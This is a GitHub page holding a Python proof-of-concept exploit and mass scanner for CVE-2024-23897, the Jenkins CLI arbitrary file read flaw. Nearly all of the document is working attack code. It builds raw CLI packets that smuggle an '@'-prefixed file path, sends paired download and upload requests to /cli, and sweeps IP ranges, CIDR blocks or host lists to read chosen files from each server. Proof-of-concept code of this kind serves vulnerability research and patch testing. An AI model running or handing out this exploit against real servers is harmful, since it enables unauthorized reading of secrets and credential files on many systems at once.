-
Notifications
You must be signed in to change notification settings - Fork 23
/
CVE-2024-23897.py
188 lines (155 loc) · 6.85 KB
/
CVE-2024-23897.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
#!/usr/bin/env python3
import threading
import http.client
import time
import uuid
import sys
import urllib.parse
import argparse
import ipaddress
BLUE = "\033[94m"
GREEN = "\033[92m"
RED = "\033[91m"
ENDC = "\033[0m"
CONTENT_TYPE_OCTET_STREAM = 'application/octet-stream'
ARBITRATY_CHAR = '@'
def display_help_message():
parser.print_help()
def display_banner():
banner = """
CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner.
Alexander Hagenah / @xaitax / ah@primepage.de"
"""
print(BLUE + banner + ENDC)
def expand_cidr(cidr):
try:
ip_network = ipaddress.ip_network(cidr, strict=False)
return [str(ip) for ip in ip_network.hosts()]
except ValueError:
return []
def expand_range(ip_range):
start_ip, end_ip = ip_range.split('-')
start_ip = ipaddress.ip_address(start_ip)
end_ip = ipaddress.ip_address(end_ip)
return [str(ipaddress.ip_address(start_ip) + i) for i in range(int(end_ip) - int(start_ip) + 1)]
def expand_list(ip_list):
return ip_list.split(',')
def generate_ip_list(target):
if '-' in target:
return expand_range(target)
elif ',' in target:
return expand_list(target)
elif '/' in target:
return expand_cidr(target)
else:
return [target]
def handle_target(target_url, session_id, data_bytes):
print(BLUE + f"🔍 Scanning {target_url}" + ENDC)
if args.output_file:
write_to_output_file(args.output_file, f"🔍 Scanning {target_url}")
download_thread = threading.Thread(target=send_download_request, args=(target_url, session_id))
upload_thread = threading.Thread(target=send_upload_request, args=(target_url, session_id, data_bytes))
download_thread.start()
time.sleep(0.1)
upload_thread.start()
download_thread.join()
upload_thread.join()
def send_download_request(target_url, session_id):
try:
parsed_url = urllib.parse.urlparse(target_url)
connection = http.client.HTTPConnection(parsed_url.netloc, timeout=10)
connection.request("POST", "/cli?remoting=false", headers={
"Session": session_id,
"Side": "download"
})
response = connection.getresponse().read()
result = f"💣 Exploit Response from {target_url}: \n{response.decode()}"
print(GREEN + result + ENDC)
if args.output_file:
write_to_output_file(args.output_file, result)
except Exception as e:
error_message = f"❌ {target_url} not reachable: {e}\n"
print(RED + error_message + ENDC)
if args.output_file:
write_to_output_file(args.output_file, error_message)
def send_upload_request(target_url, session_id, data_bytes):
try:
parsed_url = urllib.parse.urlparse(target_url)
connection = http.client.HTTPConnection(parsed_url.netloc, timeout=10)
connection.request("POST", "/cli?remoting=false", headers={
"Session": session_id,
"Side": "upload",
"Content-type": CONTENT_TYPE_OCTET_STREAM
}, body=data_bytes)
response = connection.getresponse().read()
except Exception as e:
pass
def read_hosts_from_file(file_path):
with open(file_path, 'r') as file:
return [line.strip() for line in file if line.strip()]
def write_to_output_file(file_path, data):
with open(file_path, 'a', encoding='utf-8') as file:
file.write(data + '\n')
def build_data_segment(file_path,command,language):
return calculate_header_in_bytes(command) + calculate_payload_in_bytes(file_path) + calculate_tail_in_bytes(language)
def calculate_header_in_bytes(command):
"""Creates the header of the packet that contains the command."""
header_slice = ()
if command == "help":
header_slice = (b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00')
elif command == "who-am-i":
header_slice = (b'\x00\x00\x00\x0A\x00\x00\x08who-am-i\x00\x00\x00')
elif command == "connect-node":
header_slice = (b'\x00\x00\x00\x0E\x00\x00\x0Cconnect-node\x00\x00\x00')
else:
header_slice = (b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00')
return header_slice
def calculate_payload_in_bytes(file_path):
"""Creates the primary payload of the packet - including file path."""
file_path = ARBITRATY_CHAR + file_path
hex_value_for_payload = decimal_to_hex(len(file_path))
hex_value_for_payload_header = decimal_to_hex((len(file_path)+2))
payload_slice = (
b'' + hex_value_for_payload_header + b'\x00\x00' + hex_value_for_payload + file_path.encode()
)
return payload_slice
def calculate_tail_in_bytes(language):
"""Creates the tail end of the packet that contains language."""
tail_slice = (
b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05'+ language.encode() + b'\x00\x00\x00\x00\x03')
return tail_slice
def decimal_to_hex(decimal_value):
"""Converts a decimal value to its hexadecimal representation."""
if not isinstance(decimal_value, int):
raise ValueError("Input must be an integer.")
if decimal_value < 0:
raise ValueError("Input must be non-negative.")
hex_string = hex(decimal_value)[2:]
hex_bytes = bytes.fromhex(hex_string.zfill(2))
return hex_bytes
parser = argparse.ArgumentParser(description='CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 exploitation and scanner.')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-t', '--target', help='Target specification. Can be a single IP (e.g., 192.168.1.1), a range of IPs (e.g., 192.168.1.1-192.168.1.255), a list of IPs separated by commas (e.g., 192.168.1.1,192.168.1.2), or a CIDR block (e.g., 192.168.1.0/24).')
group.add_argument('-i', '--input-file', help='Path to input file containing hosts.')
parser.add_argument('-p', '--port', type=int, default=8080, help='Port number. Default is 8080.')
parser.add_argument('-f', '--file', required=True, help='File to read on the target system. Only maximum of 3 lines can be extracted.')
parser.add_argument('-o', '--output-file', help='Path to output file for saving the results.')
parser.add_argument('-c', '--command',default="help", help="The jenkinds-cli.jar command [help|who-am-i|connect-node]. Default is 'help'.")
parser.add_argument('-l', '--language',default="en_US", help="The language code you want to use." )
display_banner()
if len(sys.argv) == 1:
display_help_message()
sys.exit(1)
args = parser.parse_args()
# data packet will adjust based on file
data_bytes = build_data_segment(
args.file,args.command,
args.language)
if args.input_file:
target_urls = read_hosts_from_file(args.input_file)
else:
target_ips = generate_ip_list(args.target)
target_urls = [f'http://{target_ip}:{args.port}' for target_ip in target_ips]
for target_url in target_urls:
session_id = str(uuid.uuid4())
handle_target(target_url, session_id, data_bytes)